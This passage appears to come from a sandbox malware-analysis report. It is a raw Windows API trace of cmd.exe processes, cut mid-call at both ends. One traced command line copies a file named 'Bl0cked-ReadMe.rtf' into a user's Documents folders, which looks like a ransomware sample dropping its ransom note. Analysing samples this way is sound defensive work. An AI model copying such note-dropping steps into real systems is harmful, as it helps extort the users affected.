[0130.579] FindClose (in: hFindFile=0x300ee8 | out: hFindFile=0x300ee8) returned 1 [0130.579] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16e988 | out: _Buffer=" 1") returned 9 [0130.579] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.579] GetFileType (hFile=0x7) returned 0x2 [0130.727] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0130.727] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16e914 | out: lpMode=0x16e914) returned 1 [0130.727] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.727] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e948 | out: lpConsoleScreenBufferInfo=0x16e948) returned 1 [0130.727] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 
[0130.728] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16e988 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0130.728] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16e96c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16e96c*=0x1a) returned 1 [0130.728] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.728] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0130.728] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.728] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0130.728] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.728] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0130.728] SetConsoleInputExeNameW () returned 0x1 [0130.728] GetConsoleOutputCP () returned 0x1b5 [0130.729] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.729] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.729] exit (_Code=0) Process: id = "100" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16920" os_pid = "0x828" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" 
[0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11578 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11579 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11580 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11581 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 11582 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11583 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11584 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11585 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11586 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 11587 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11622 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11623 
start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11624 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11625 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 11626 start_va = 0x5d0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 11627 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 11628 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11629 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11630 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11631 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11632 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: 
"c:\\windows\\system32\\user32.dll") Region: id = 11633 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11634 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11635 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11636 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 11637 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11638 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 11639 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 11640 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 11641 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 11642 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 11643 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = 
"" Region: id = 11644 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 11645 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 157 os_tid = 0x838 [0130.602] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f954 | out: lpSystemTimeAsFileTime=0x22f954*(dwLowDateTime=0x87c7adc0, dwHighDateTime=0x1d440a9)) [0130.602] GetCurrentProcessId () returned 0x828 [0130.602] GetCurrentThreadId () returned 0x838 [0130.602] GetTickCount () returned 0x29b16 [0130.602] QueryPerformanceCounter (in: lpPerformanceCount=0x22f94c | out: lpPerformanceCount=0x22f94c*=18739153294) returned 1 [0130.603] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0130.603] __set_app_type (_Type=0x1) [0130.603] __p__fmode () returned 0x76b331f4 [0130.603] __p__commode () returned 0x76b331fc [0130.603] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0130.603] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0130.603] GetCurrentThreadId () returned 0x838 [0130.603] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x838) returned 0x38 [0130.603] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0130.603] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0130.603] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.603] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.604] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f8e4 | out: phkResult=0x22f8e4*=0x0) returned 0x2 [0130.604] 
VirtualQuery (in: lpAddress=0x22f91b, lpBuffer=0x22f8b4, dwLength=0x1c | out: lpBuffer=0x22f8b4*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.604] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22f8b4, dwLength=0x1c | out: lpBuffer=0x22f8b4*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0130.604] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22f8b4, dwLength=0x1c | out: lpBuffer=0x22f8b4*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0130.604] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22f8b4, dwLength=0x1c | out: lpBuffer=0x22f8b4*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.604] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22f8b4, dwLength=0x1c | out: lpBuffer=0x22f8b4*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xb0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0130.604] GetConsoleOutputCP () returned 0x1b5 [0130.604] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.604] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0130.604] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.604] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0130.604] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.604] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0130.604] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.604] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0130.604] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.604] GetConsoleMode (in: hConsoleHandle=0x3, 
lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0130.605] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.605] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0130.605] GetEnvironmentStringsW () returned 0x2f0188* [0130.605] FreeEnvironmentStringsW (penv=0x2f0188) returned 1 [0130.605] GetEnvironmentStringsW () returned 0x2f0188* [0130.605] FreeEnvironmentStringsW (penv=0x2f0188) returned 1 [0130.605] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e854 | out: phkResult=0x22e854*=0x40) returned 0x0 [0130.605] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x0, lpData=0x22e860*=0xb0, lpcbData=0x22e858*=0x1000) returned 0x2 [0130.605] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x4, lpData=0x22e860*=0x1, lpcbData=0x22e858*=0x4) returned 0x0 [0130.605] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x0, lpData=0x22e860*=0x1, lpcbData=0x22e858*=0x1000) returned 0x2 [0130.605] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x4, lpData=0x22e860*=0x0, lpcbData=0x22e858*=0x4) returned 0x0 [0130.605] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x4, lpData=0x22e860*=0x40, lpcbData=0x22e858*=0x4) returned 0x0 [0130.605] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: 
lpType=0x22e85c*=0x4, lpData=0x22e860*=0x40, lpcbData=0x22e858*=0x4) returned 0x0 [0130.605] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x0, lpData=0x22e860*=0x40, lpcbData=0x22e858*=0x1000) returned 0x2 [0130.605] RegCloseKey (hKey=0x40) returned 0x0 [0130.606] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e854 | out: phkResult=0x22e854*=0x40) returned 0x0 [0130.606] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x0, lpData=0x22e860*=0x40, lpcbData=0x22e858*=0x1000) returned 0x2 [0130.606] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x4, lpData=0x22e860*=0x1, lpcbData=0x22e858*=0x4) returned 0x0 [0130.606] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x0, lpData=0x22e860*=0x1, lpcbData=0x22e858*=0x1000) returned 0x2 [0130.606] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x4, lpData=0x22e860*=0x0, lpcbData=0x22e858*=0x4) returned 0x0 [0130.606] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x4, lpData=0x22e860*=0x9, lpcbData=0x22e858*=0x4) returned 0x0 [0130.606] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x4, lpData=0x22e860*=0x9, lpcbData=0x22e858*=0x4) 
returned 0x0 [0130.606] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e85c, lpData=0x22e860, lpcbData=0x22e858*=0x1000 | out: lpType=0x22e85c*=0x0, lpData=0x22e860*=0x9, lpcbData=0x22e858*=0x1000) returned 0x2 [0130.606] RegCloseKey (hKey=0x40) returned 0x0 [0130.606] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886365 [0130.606] srand (_Seed=0x5b886365) [0130.606] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" [0130.606] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" [0130.606] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.606] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2f18e8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0130.606] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.606] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.606] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.606] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0130.607] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0130.607] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0130.607] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0130.607] _wcsicmp 
(_String1="PROMPT", _String2="DATE") returned 12 [0130.607] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0130.607] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0130.607] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0130.607] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0130.607] GetEnvironmentStringsW () returned 0x2f22d8* [0130.607] FreeEnvironmentStringsW (penv=0x2f22d8) returned 1 [0130.607] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.607] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.607] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0130.607] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0130.607] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0130.607] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0130.607] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0130.607] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0130.607] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0130.607] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0130.607] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f620 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.607] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f620, lpFilePart=0x22f61c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f61c*="Desktop") returned 0x18 [0130.607] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0130.607] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f39c | out: lpFindFileData=0x22f39c) returned 0x2f0018 [0130.607] FindClose (in: hFindFile=0x2f0018 | out: 
hFindFile=0x2f0018) returned 1 [0130.608] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f39c | out: lpFindFileData=0x22f39c) returned 0x2f0018 [0130.608] FindClose (in: hFindFile=0x2f0018 | out: hFindFile=0x2f0018) returned 1 [0130.608] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f39c | out: lpFindFileData=0x22f39c) returned 0x2f0018 [0130.608] FindClose (in: hFindFile=0x2f0018 | out: hFindFile=0x2f0018) returned 1 [0130.608] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0130.608] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0130.608] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0130.608] GetEnvironmentStringsW () returned 0x2f2af8* [0130.608] FreeEnvironmentStringsW (penv=0x2f2af8) returned 1 [0130.608] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.609] GetConsoleOutputCP () returned 0x1b5 [0130.609] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.609] GetUserDefaultLCID () returned 0x409 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f760, cchData=128 | out: lpLCData="0") returned 2 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f760, cchData=128 | out: lpLCData="0") returned 2 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f760, cchData=128 | out: lpLCData="1") returned 2 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: 
lpLCData="Mon") returned 4 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0130.609] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0130.610] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0130.610] GetConsoleTitleW (in: lpConsoleTitle=0x2e08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.610] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0130.610] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0130.610] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0130.611] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0130.611] _wcsicmp (_String1="type", _String2=")") returned 75 [0130.611] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0130.611] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0130.611] _wcsicmp (_String1="IF", _String2="type") returned -11 [0130.611] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0130.611] _wcsicmp (_String1="REM", _String2="type") 
returned -2 [0130.611] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0130.615] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.616] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.616] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.616] GetFileType (hFile=0x7) returned 0x2 [0130.616] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0130.616] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f658 | out: lpMode=0x22f658) returned 1 [0130.616] _dup (_FileHandle=1) returned 3 [0130.616] _close (_FileHandle=1) returned 0 [0130.616] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0130.616] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x22f628, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0130.618] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0130.618] GetConsoleTitleW (in: lpConsoleTitle=0x22f458, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.618] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0130.618] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0130.618] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0130.618] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0130.618] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | 